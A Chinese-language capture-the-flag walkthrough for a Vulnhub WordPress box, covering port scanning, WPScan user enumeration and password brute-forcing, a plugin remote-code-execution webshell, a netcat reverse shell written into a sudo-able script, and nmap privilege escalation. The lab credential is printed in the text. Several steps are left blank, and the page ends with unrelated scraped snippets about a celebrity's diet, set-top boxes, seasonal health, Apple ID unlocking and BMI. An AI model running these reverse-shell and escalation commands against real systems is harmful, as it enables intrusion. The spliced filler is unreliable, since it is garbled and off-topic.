Vulnhub提示:
扫描靶机IP地址:nmap -sP 192.168.10.0/24
扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129
开放端口22,80
访问80端口发现URL被重定向到wordy
我们需要在host文件中添加
文件位置 /etc/hosts
可以访问到啦
扫描下目录结构吧,
御剑扫描
发现是wordpress站点
使用WPscan扫描
一款专注于wordpress站点扫描工具
wpscan -url wordy
顺便枚举一下用户
站点没发现什么漏洞,暴力破解尝试下
root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt
破解很久没获取密码,这时候想起Vulnhub重要提示
root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
使用这个字典在尝试下暴力破解
root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt
获得密码
mark
helpdesk01
登录后台发现Activity on Wordy插件存在远程代码执行漏洞
利用远程代码执行命令漏洞步骤:
step1:打开burpsuite工具设置 ***
step2:
step3:发送到重写模块
step4:kali打开端口监听
step5:
利用成功获取到webshell
横向移动搜寻可以利用的信息
成功找到了graham的密码信息
查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本
如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell
echo “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh
kali 端监听 8888 端口
sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的
jens用户可以以 root权限执行 nmap nmap 提权分为两种
旧版本上以进入交互提权
# 进入nmap的交互模式 nmap --interactive # 执行sh,提权成功 !sh
新版本
echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF
2月18日,罗志祥在个人社交平台晒出动态称:“故意乱吃乱喝,两个半月胖了12公斤,现在82公斤,今天开始减肥,GO!”他在农历新年回家吃妈妈做的团圆饭,菜色大鱼大肉,当时发...
小编整理了目前现在市场上主流的,在品牌、性能、价格、口碑、服务、售后上相对出色的10个机顶盒!(个人观点仅供参考) 一、品牌:英菲克 英菲克i9八核价位299 八核芯片,也是现在市面上唯一一...
立刻便是霜降节气了,很多人针对霜降节气并并不是尤其掌握,实际上过去了霜降节气平均气温便会很低了,因此 在这个时候大伙儿必须刚开始立即加上衣服,降霜季节,保健养生至关重要。民俗有俗语“一年补大透,比不上...
本文导读目录: 1、苹果手机账号被黑客锁住怎么解开 2、黑客是怎么解苹果id 3、黑客怎样解苹果id锁/黑客怎样解苹果id锁 4、iPhone6 的 Apple ID账号密码被黑客攻击,请...
黑客是什么意思何谓黑客 1、黑客是指对设计、编程和计算机科学方面具高度理解的人。泛指擅长IT技术的电脑高手,Hacker们精通各种编程语言和各类操作系统,伴随着计算机和网络的发展而产生成长。2、黑客的...
体重指数怎么算(正常人的标准体重是多少?)随着时代的进步发展,每个时期人们的审美都不太一样。唐朝有一段时间是以胖为美,认为偏胖的人看起来有富态,更容易受到人们的欢迎。前一段时间,流行骨感美女,人人都以...